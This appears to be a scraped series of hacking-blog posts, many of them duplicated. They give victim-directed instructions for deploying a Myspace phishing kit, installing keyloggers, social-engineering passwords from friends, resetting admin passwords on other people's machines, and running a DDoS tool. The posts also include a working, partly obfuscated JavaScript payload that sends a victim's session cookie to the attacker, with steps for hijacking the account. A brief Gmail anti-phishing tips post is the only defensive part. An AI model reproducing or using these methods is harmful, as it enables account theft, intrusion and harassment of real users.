Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!
DOWNLOAD HERE: http://rapidshare.com/files/104926676/LOIC.exe
I would like to inform you that i have not yet tried this hack, so i cant tell you much about it...sorry for that. But, you can help me out by commenting your experience or even by mailing me.
Enjoy HaCkInG.....
Nowadays, its very common to hear about various incidents of Gmail hacking by Gmail phisher. Today, online privacy is maintained only if the user is aware of various hacks used to hack email accounts. Hence, i thought of writing an article on the same topic of preventing Gmail from being hacked by hackers. Friends, i highly recommend you to read this article to prevent ur future damages.
>>What is a phisher?
I have explained in my post Hack email account password by phishing., Phishing is the best working method of hacking email account. The advantage of phishing in email account hacking is that victim is not able to recognise the fake page (phisher) as this phisher matches with the original page(depends on hacker skills).
So, here i have mentioned few tips which you should follow to prevent hacking of your email account by hackers. So lets start:
1. Fishing filter:
I will recommend use of browser which has phishing filter. Internet browsers like Firefox 3.0(my favorite), Internet Explorer 7, Opera 7x which contain phishing filter should be used for safe browsing.
2. Do not provide sensitive information :
Yes, this is the main thing you have to remember. Unless and until, you know the person or institute, do not give your sensitive information like userids , passwords, bank account numbers as a reply to any email. In fact, 90% emails demanding such information are meant for hacking..remember !
3. Suspicious Filters :
Check whether there are any suspicious filters not created by you. For checking ur email filters, go to Settings->Filters. If you find any such suspicious filter not created by you, delete it urgently.
4. Great offers, ads, winners :
Generally, Gmail users are deceived by emails which contain great offers, ads or declaring that u are lucky winner and you should provide listed query information to receive your cash prize. Never click or provide any information for such claiming emails.
5. Disable Forwarding and POP/IMAP :
To disable forwarding and POP/IMAP, go to Settings-> Forwarding and POP/IMAP and disable forwarding and POP/IMAP.
6. The most important :
The most important precaution which one must follow is "do not click on the link" provided in the email without knowing to which page the link will take you. I have added my personal experience of phishing and the method to determine the link target, where i received a paypal phisher, in my article Paypal phisher to hack Paypal account. One more thing, always open link given in email by typing address of site in new tab/window.
Thus, if you will follow these guidelines, i bet ur Gmail account will never be hacked by a phisher. Just remember the guidelines and prevent Gmail account from being hacked by hackers.
Enjoy HaCkInG.....
After informing you about the 4 popular and the best methods to hack Myspace account password as in my article How to hack myspace profile/account passwords, i will now inform you about “Myspace Phishing using Myspace Phisher” in this article. I have provided download link at end of this article to download Myspace Phisher about which i will be talking about in the article.
What do you think is the above site about?? Myspace….think it again. Its a Myspace phisher ready to steal account password.
Note: The article is for educational purpose only. I am not responsible for any action done by any reader. Any damage caused is sole responsibility of user.
Steps to use Myspace Phisher to hack myspace profile/account:
1. Download Myspace phisher from download link given at end.
2. The downloaded folder contains subfolder named “Myspace” which contains 3 files:
a. Index.html (our phisher to be sent).
b. next.php and
c. passwords.txt
Make sure you get all 3 files.
3. Now, simply upload these 3 files to a free webhost. You can use http://www.100webspace.com/ for this purpose as it is free.
4. Now, simply send index.html page (phisher) to the victim. You can use anonymous mailers for this purpose. Also, make sure that link of myspace phisher nearly matches with the corresponding original myspace page. Ask the victim to login to his myspace private account by using this page. You can make him do this by telling that his myspace account is accessed by 3rd party and to ensure his security, he should login immediately to his account and just provide myspace phisher link just below your saying. I once faced the same phisher…..was almost fallen but saved. You can even use many other myspace ways…depends on victim attitude, nature and your logic.
5. Thats it. Once, victim logins with myspace phisher, you will get password of his myspace private account.
Download Myspace Account phisher
This terminates the article over here. So, i hope you will now be able to hack myspace account/profile password using Myspace phisher. Can contact me for any help on how to hack myspace account password.
Enjoy HaCkInG…..
What do you think is the above site about?? Myspace….think it again. Its a Myspace phisher ready to steal account password.
Note: The article is for educational purpose only. I am not responsible for any action done by any reader. Any damage caused is sole responsibility of user.
Steps to use Myspace Phisher to hack myspace profile/account:
1. Download Myspace phisher from download link given at end.
2. The downloaded folder contains subfolder named “Myspace” which contains 3 files:
a. Index.html (our phisher to be sent).
b. next.php and
c. passwords.txt
Make sure you get all 3 files.
3. Now, simply upload these 3 files to a free webhost. You can use http://www.100webspace.com/ for this purpose as it is free.
4. Now, simply send index.html page (phisher) to the victim. You can use anonymous mailers for this purpose. Also, make sure that link of myspace phisher nearly matches with the corresponding original myspace page. Ask the victim to login to his myspace private account by using this page. You can make him do this by telling that his myspace account is accessed by 3rd party and to ensure his security, he should login immediately to his account and just provide myspace phisher link just below your saying. I once faced the same phisher…..was almost fallen but saved. You can even use many other myspace ways…depends on victim attitude, nature and your logic.
5. Thats it. Once, victim logins with myspace phisher, you will get password of his myspace private account.
Download Myspace Account phisher
This terminates the article over here. So, i hope you will now be able to hack myspace account/profile password using Myspace phisher. Can contact me for any help on how to hack myspace account password.
Enjoy HaCkInG…..
The article below explains the most popular ways used to hack myspace account passwords. I came across many myspace password hacking ways- some working …some not. So, i thought of collecting all these working myspace methods/ways of hacking myspace account password in this myspace article.
I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.
So, lets start…
Hack Myspace Account password
1. Myspace Phishing:
I have taken this myspace hacking method first because i think this is the most popular method/way to hack myspace private account. I studied various surveys taken on web about hacking myspace. The results of these surveys show “Phishing” as the most used method to hack myspace and to note…”Phishing is favorite method of hackers”. So, friends.. beware of Phishing. Myspace staff is working hard to avoid these phishers. Phishing not only allows you to hack myspace but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article Hack Myspace account password by Myspace Phisher
2.Keylogging:
This is my second favorite, as only thing you have to do is remotely install a keylogger (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded myspace account passwords to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use this log to get required myspace password and thus can hack myspace account. You can use Ardamax keylogger or Winspy Keylogger to hack myspace account password.
3. Social engineering:
This sounds to be pretty not working at beginning. Even i was neglecting this way. But, once, i thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engg is method of retrieving password or answer of security question simply by quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
4. Hacker virus:
I was not knowing about this method used by myspace hackers at myspace until i read this article. I wasn't knowing that myspace viruses are being circulated over myspace and was considering myspace as safe. But to my surprise, i was wrong. So, friends, be cautious while surfing myspace.
So far, i found these myspace hacking methods as best and working ways to hack myspace account passwords. I never encourage hacking myspace or any email account…just wanna make you cognizant about myspace dangers online. I will appreciate your effort if you mention any other method you found great….
Enjoy HaCkInG…..
I will cover 4 methods over here:
1. Myspace Phishing.
2. Keylogging
3. Social engineering
4. Hacker virus at myspace.
So, lets start…
Hack Myspace Account password
1. Myspace Phishing:
I have taken this myspace hacking method first because i think this is the most popular method/way to hack myspace private account. I studied various surveys taken on web about hacking myspace. The results of these surveys show “Phishing” as the most used method to hack myspace and to note…”Phishing is favorite method of hackers”. So, friends.. beware of Phishing. Myspace staff is working hard to avoid these phishers. Phishing not only allows you to hack myspace but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article Hack Myspace account password by Myspace Phisher
2.Keylogging:
This is my second favorite, as only thing you have to do is remotely install a keylogger (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded myspace account passwords to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use this log to get required myspace password and thus can hack myspace account. You can use Ardamax keylogger or Winspy Keylogger to hack myspace account password.
3. Social engineering:
This sounds to be pretty not working at beginning. Even i was neglecting this way. But, once, i thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engg is method of retrieving password or answer of security question simply by quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
4. Hacker virus:
I was not knowing about this method used by myspace hackers at myspace until i read this article. I wasn't knowing that myspace viruses are being circulated over myspace and was considering myspace as safe. But to my surprise, i was wrong. So, friends, be cautious while surfing myspace.
So far, i found these myspace hacking methods as best and working ways to hack myspace account passwords. I never encourage hacking myspace or any email account…just wanna make you cognizant about myspace dangers online. I will appreciate your effort if you mention any other method you found great….
Enjoy HaCkInG…..
So be ready to access Admin account ...
First you will want to download a software named WINTERNALS as an iso image at www.isohunt.com, once you done that burn it to a cd with an iso burner software.
-Once thats done you will turn the computer that you want to change the password off and when its booting up press F10, or F12, or F8 varies depending on the computer.
-You need to find the one that says BOOT DEVICE and it gives you a lot of other options like booting up from a floopy disk, but you want the one that says CDROM
-Insert the disk and press enter twice this will start the cd and it will say LOADING WINTERNALS then you will get a dialog box asking you what operating system to boot from so choose Windows sp2 and press enter
-You will notice that you get a desktop similar to windows, now go to start and look for the application named LOCKSMITH and press enter
-Now it will ask you what account to change the password
-Choose what ever account you want preferably choose the administrator account
-Now change the password, and press enter.
-And your almost done, now press start and press log off and choose restart.
-This will Restart the computer as usual now you can log on as the administrator account with the password you set.
Congrats....u've changed admin password...
Enjoy HaCkInG.....
First you will want to download a software named WINTERNALS as an iso image at www.isohunt.com, once you done that burn it to a cd with an iso burner software.
-Once thats done you will turn the computer that you want to change the password off and when its booting up press F10, or F12, or F8 varies depending on the computer.
-You need to find the one that says BOOT DEVICE and it gives you a lot of other options like booting up from a floopy disk, but you want the one that says CDROM
-Insert the disk and press enter twice this will start the cd and it will say LOADING WINTERNALS then you will get a dialog box asking you what operating system to boot from so choose Windows sp2 and press enter
-You will notice that you get a desktop similar to windows, now go to start and look for the application named LOCKSMITH and press enter
-Now it will ask you what account to change the password
-Choose what ever account you want preferably choose the administrator account
-Now change the password, and press enter.
-And your almost done, now press start and press log off and choose restart.
-This will Restart the computer as usual now you can log on as the administrator account with the password you set.
Congrats....u've changed admin password...
Enjoy HaCkInG.....
This post describes method used to crack/recover windows XP password by using Lophtcrack. Thus, it can be used to recover lost passwords or even crack administrator accounts.
Update: For cracking Windows Vista admin account click here. Even John the Ripper is a powerful password cracking tool...
Now this what m gonna share is old but still works well.
Reference: geekwithlaptop
There's a way to crack the password and it doesn't involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.
How Lophtcrack works:
Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and then displayed to the screen.
Good intentions:
can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to access computers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.
Bad intentions:
Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domaincontroller and steal hundreds of passwords within minutes.
Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses or implied by http://rajeshhackingarticles.blogspot.com
Software License:
LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.
You can check out other posts related to password cracking:
Change Admin password...
Enjoy HaCkInG......
Update: For cracking Windows Vista admin account click here. Even John the Ripper is a powerful password cracking tool...
Now this what m gonna share is old but still works well.
Reference: geekwithlaptop
There's a way to crack the password and it doesn't involve reformatting and reinstalling Windows. The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I m going to let you in on a program called LC5. Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks. LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer. The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.
How Lophtcrack works:
Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute. Eventually the correct password will be sent and then displayed to the screen.
Good intentions:
can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to access computers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.
Bad intentions:
Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domaincontroller and steal hundreds of passwords within minutes.
Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty expresses or implied by http://rajeshhackingarticles.blogspot.com
Software License:
LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.
You can check out other posts related to password cracking:
Change Admin password...
Enjoy HaCkInG......
The post was added on demand "Where to download orkut hacktool" requested by Jai Sharma.
In my post Hack Orkut account by cookie stealing, i have explained the method used by most hackers to hack orkut account password. Now, here in this post "Hack Orkut account password by Orkut Hacktool", i have explained the use of orkut hacktool to hack orkut accounts. I have even added download link at the end of post to download this orkut hacktool for hacking orkut account.
Type: Orkut Software
COMPILED By: Vivek
Published at:
FABULOUS COLLECTION OF ORKUT TOOLS
ALL TOOLS AND SCRIPTS FOR ORKUT U WILL EVER NEED
Developed by OUGIANS
It contains tools like
► Floodmachines
► Profile Maker
► Community Spammer
► Community Joiner
► Accept All & Reject all Friends
and some more tools and scripts.
Sreenshots:
Enjoy HaCkInG.....
In my post Hack Orkut account by cookie stealing, i have explained the method used by most hackers to hack orkut account password. Now, here in this post "Hack Orkut account password by Orkut Hacktool", i have explained the use of orkut hacktool to hack orkut accounts. I have even added download link at the end of post to download this orkut hacktool for hacking orkut account.
Type: Orkut Software
COMPILED By: Vivek
Published at:
FABULOUS COLLECTION OF ORKUT TOOLS
ALL TOOLS AND SCRIPTS FOR ORKUT U WILL EVER NEED
Developed by OUGIANS
It contains tools like
► Floodmachines
► Profile Maker
► Community Spammer
► Community Joiner
► Accept All & Reject all Friends
and some more tools and scripts.
Sreenshots:
Download Link:
Click Here to Download Orkut account hacktool
password:- viveksinhaanurag
Enjoy HaCkInG.....
I have explained in my post Hack orkut account by Orkut hacktool the method used to hack orkut accounts using a orkut hacktool. This article below explains the method to hack orkut account by stealing orkut account cookies. Hacking orkut accounts has become much popular and hence i have added this article which will help you in hacking your friend's orkut account. Just ask the victim to copy the script in address bar and then you will be able to login/access /hack his orkut account. The another method for hacking orkut accounts is by means of orkut phishing (fake orkut login) which i have explained in my post Using phishing to hack accounts.
Note: My purpose is only to make u aware of what's happening around and not to teach u hacking orkut account, gmail or any account in any sort!!.
Procedure for hacking orkut account by stealing orkut cookies from mozilla firefox to hack gmail or orkut is given below.
"Hacking orkut account or Gmail" by "stealing orkut account cookies" :
The post explains how one can steal cookies to hack orkut account or gmail account. No password cracking method required.
Steps to hack gmail or orkut account password by stealing orkut cookies:-
1.Firstly you need have Mozilla firefox.
2.Download cookie editor plugin for Mozilla firefox from:
https://addons.mozilla.org/en-US/firefox/addon/573
3.You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()
How to use orkut cookies script?
1. Replace your number "UserId.value=33444211"
How to Replace your Number
1. Go to your Orkut album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.
Your script will look like.
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.
3.You'll get his orkut account cookie in your scrap book.
4.After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211).
Thats it your done with.
Logout of your orkut and login again and you'll be in your victims Homepage.
6.So remember guys...if you are having orkut account or having any other account....never use any suspicious script to prevent anyone from hacking/accessing your orkut account.
I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim's orkut account. Enjoy hacking orkut.
Enjoy HaCkInG.....
Note: My purpose is only to make u aware of what's happening around and not to teach u hacking orkut account, gmail or any account in any sort!!.
Procedure for hacking orkut account by stealing orkut cookies from mozilla firefox to hack gmail or orkut is given below.
"Hacking orkut account or Gmail" by "stealing orkut account cookies" :
The post explains how one can steal cookies to hack orkut account or gmail account. No password cracking method required.
Steps to hack gmail or orkut account password by stealing orkut cookies:-
1.Firstly you need have Mozilla firefox.
2.Download cookie editor plugin for Mozilla firefox from:
https://addons.mozilla.org/en-US/firefox/addon/573
3.You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()
How to use orkut cookies script?
1. Replace your number "UserId.value=33444211"
How to Replace your Number
1. Go to your Orkut album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.
Your script will look like.
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.
3.You'll get his orkut account cookie in your scrap book.
4.After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211).
Thats it your done with.
Logout of your orkut and login again and you'll be in your victims Homepage.
6.So remember guys...if you are having orkut account or having any other account....never use any suspicious script to prevent anyone from hacking/accessing your orkut account.
I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim's orkut account. Enjoy hacking orkut.
Enjoy HaCkInG.....
Subscribe to:
Posts (Atom)
